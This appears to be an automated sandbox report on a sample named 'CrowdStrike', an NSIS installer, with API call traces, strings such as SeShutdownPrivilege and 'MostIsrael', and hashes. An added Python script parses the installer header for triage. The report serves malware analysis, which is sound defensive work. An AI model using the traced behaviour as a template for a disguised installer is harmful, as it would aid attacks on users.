                                                                        • #17.COMCTL32 ref: 004038A2
                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                        • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                        • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                        • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                        • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                        • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                        • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                        • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                        • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                        • OleUninitialize.OLE32(?), ref: 00403AD1
                                                                        • ExitProcess.KERNEL32 ref: 00403AF1
                                                                        • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                        • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                        • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                        • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                        • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                        • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                        • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                        • API String ID: 2435955865-239407132
                                                                        • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                        • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                        • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                        • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                        Control-flow Graph

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                        • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                        • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                        • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                        • String ID:
                                                                        • API String ID: 310444273-0
                                                                        • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                        • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                        • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                        • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                        • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                        • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                        • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                        • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                        • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                        Strings
                                                                        • Rename: %s, xrefs: 004018F8
                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                        • detailprint: %s, xrefs: 00401679
                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                        • Jump: %d, xrefs: 00401602
                                                                        • Sleep(%d), xrefs: 0040169D
                                                                        • Call: %d, xrefs: 0040165A
                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                        • BringToFront, xrefs: 004016BD
                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                        • API String ID: 2872004960-3619442763
                                                                        • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                        • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                        • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                        • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                        Control-flow Graph

                                                                        [Control-flow graph image (executed / not-executed blocks) for the function at 0040592C, basic blocks 0040592C-00405C3E. Imports called from the graph: lstrcatW, lstrlenW, lstrcmpiW, GetFileAttributesW, LoadImageW, RegisterClassW, SystemParametersInfoW, CreateWindowExW, ShowWindow, LoadLibraryW, GetClassInfoW, DialogBoxParamW. Internal subcalls: 004062FC, 00405F51, 00405ED3, 00403E95, 0040677E, 00406805, 00405D06, 00403E74, 00406722, 00406009, 00406751, 0040141D, 00405047, 00403C68.]
                                                                        APIs
                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                        • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                                                                        • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                        • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                        • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                          • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                        • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                        • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                        • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                        • API String ID: 608394941-1650083594
                                                                        • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                        • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                        • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                        • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                                                        • CompareFileTime.KERNEL32(-00000014,?,MostIsrael,MostIsrael,00000000,00000000,MostIsrael,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$MostIsrael
                                                                        • API String ID: 4286501637-3932108565
                                                                        • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                        • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                        • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                        • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                        Control-flow Graph

                                                                        [Control-flow graph image (executed / not-executed blocks) for the function at 00403587, basic blocks 00403587-004037CA. Imports called from the graph: GetTickCount, GetModuleFileNameW, GetFileSize, GlobalAlloc, SetFilePointer. Internal subcalls: 00405E50, 00406009, 00406751, 004032D2, 00403336, 00403368, 0040337F, 00405E0C, 00407281.]
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00403598
                                                                        • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                        • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                        Strings
                                                                        • Inst, xrefs: 0040366C
                                                                        • Null, xrefs: 0040367E
                                                                        • soft, xrefs: 00403675
                                                                        • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 004037C5
                                                                        • Error launching installer, xrefs: 004035D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                                                                        • API String ID: 4283519449-527102705
                                                                        • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                        • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                        • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                        • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
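The function above is the NSIS stub locating its own installer data: it calls GetModuleFileNameW and GetFileSize on itself, reads the image in 512-byte steps, and compares each chunk against the "Null", "soft" and "Inst" dwords referenced at 0040366C, 00403675 and 0040367E before running the CRC that produces "Installer integrity check has failed". The following is an added example, not code from Joe Sandbox, NSIS or the sample, that parses that record from a constructed image and repeats the same integrity check. The field names follow the firstheader struct in the NSIS exehead source; the 512-byte step and the whole-file CRC are taken from that source as well, and the /NCRC command-line switch is not modelled.

```python
"""
Locate and parse the NSIS firstheader record that the stub searches its own
image for, then run the CRC check behind "Installer integrity check has failed".

Added example, not code from Joe Sandbox, NSIS or the sample. Field layout is
the firstheader struct from the NSIS exehead source; sample images are
constructed by build_sample() below.
"""
import struct
import zlib
from dataclasses import dataclass
from typing import Optional

FH_SIG = 0xDEADBEEF
FH_MAGIC = b"NullsoftInst"                      # the dwords 'Null', 'soft', 'Inst'
FH_FLAGS = {1: "UNINSTALL", 2: "SILENT", 4: "NO_CRC", 8: "FORCE_CRC"}
FH_FLAGS_NO_CRC = 4
# flags, siginfo, magic[12], length_of_header, length_of_all_following_data
FH_STRUCT = struct.Struct("<II12sII")
MARKER = struct.pack("<I", FH_SIG) + FH_MAGIC   # bytes that follow the flags dword
CHUNK = 512                                     # step size of the stub's search loop


@dataclass
class FirstHeader:
    offset: int            # file offset of the record (start of installer data)
    flags: int
    header_length: int     # size of the (usually compressed) NSIS header block
    total_length: int      # firstheader + header + data files + trailing CRC

    @property
    def flag_names(self):
        return [n for b, n in FH_FLAGS.items() if self.flags & b]

    @property
    def aligned(self) -> bool:
        # The stub only tests CHUNK-sized reads, so a genuine record sits on a
        # CHUNK boundary; an unaligned hit is a string match, not installer data.
        return self.offset % CHUNK == 0


def find_firstheader(image: bytes) -> Optional[FirstHeader]:
    """Return the parsed record, or None when the image carries no NSIS data."""
    idx = image.find(MARKER)
    if idx < 4 or idx - 4 + FH_STRUCT.size > len(image):
        return None                     # not found, or no room for flags/lengths
    off = idx - 4
    flags, _sig, _magic, hlen, tlen = FH_STRUCT.unpack_from(image, off)
    if tlen < FH_STRUCT.size + 4 or off + tlen > len(image):
        return None                     # lengths do not fit the file: truncated/damaged
    return FirstHeader(off, flags, hlen, tlen)


def verify_crc(image: bytes, fh: FirstHeader) -> Optional[bool]:
    """
    Mirror the stub's integrity check: CRC32 of the file from offset 0 up to the
    final dword, compared with that dword. Returns None when NO_CRC disables the
    check, which is the case to flag: the stub then runs a tampered file silently.
    """
    if fh.flags & FH_FLAGS_NO_CRC:
        return None
    end = fh.offset + fh.total_length
    stored = struct.unpack_from("<I", image, end - 4)[0]
    return (zlib.crc32(image[:end - 4]) & 0xFFFFFFFF) == stored


def build_sample(flags: int, header: bytes, corrupt: bool = False) -> bytes:
    """Constructed test image: a 512-byte fake PE stub, the record, a header blob, CRC."""
    stub = (b"MZ" + b"\x00" * CHUNK)[:CHUNK]
    tlen = FH_STRUCT.size + len(header) + 4
    body = stub + FH_STRUCT.pack(flags, FH_SIG, FH_MAGIC, len(header), tlen) + header
    crc = zlib.crc32(body) & 0xFFFFFFFF
    if corrupt:
        crc ^= 0x1                      # simulate the "damaged media" case
    return body + struct.pack("<I", crc)


def triage(image: bytes) -> dict:
    """One-shot summary suitable for a sandbox post-processing step."""
    fh = find_firstheader(image)
    if fh is None:
        return {"nsis": False}
    return {
        "nsis": True,
        "offset": fh.offset,
        "aligned": fh.aligned,
        "flags": fh.flag_names,
        "header_length": fh.header_length,
        "total_length": fh.total_length,
        "crc_ok": verify_crc(image, fh),
    }


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample(0, b"\x00" * 64)
    print(triage(data))
```

Run it against a dropped installer to get the data offset and lengths for carving, and treat `crc_ok` of `None` (NO_CRC set) or an unaligned record as worth a second look: the first means the author chose to skip the check the stub would otherwise perform, the second means the marker was found in string data rather than where the stub would look for it.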

                                                                        Control-flow Graph

                                                                        [Control-flow graph image (executed / not-executed blocks) for the function at 0040337F, basic blocks 0040337F-00403585. Imports called from the graph: GetTickCount (twice), WriteFile (twice), MulDiv, wsprintfW. Internal subcalls: 00403336, 00403368, 004072F2, 00407312, 00404F72.]
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 004033E7
                                                                        • GetTickCount.KERNEL32 ref: 00403464
                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                        • wsprintfW.USER32 ref: 004034A4
                                                                        • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                        • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
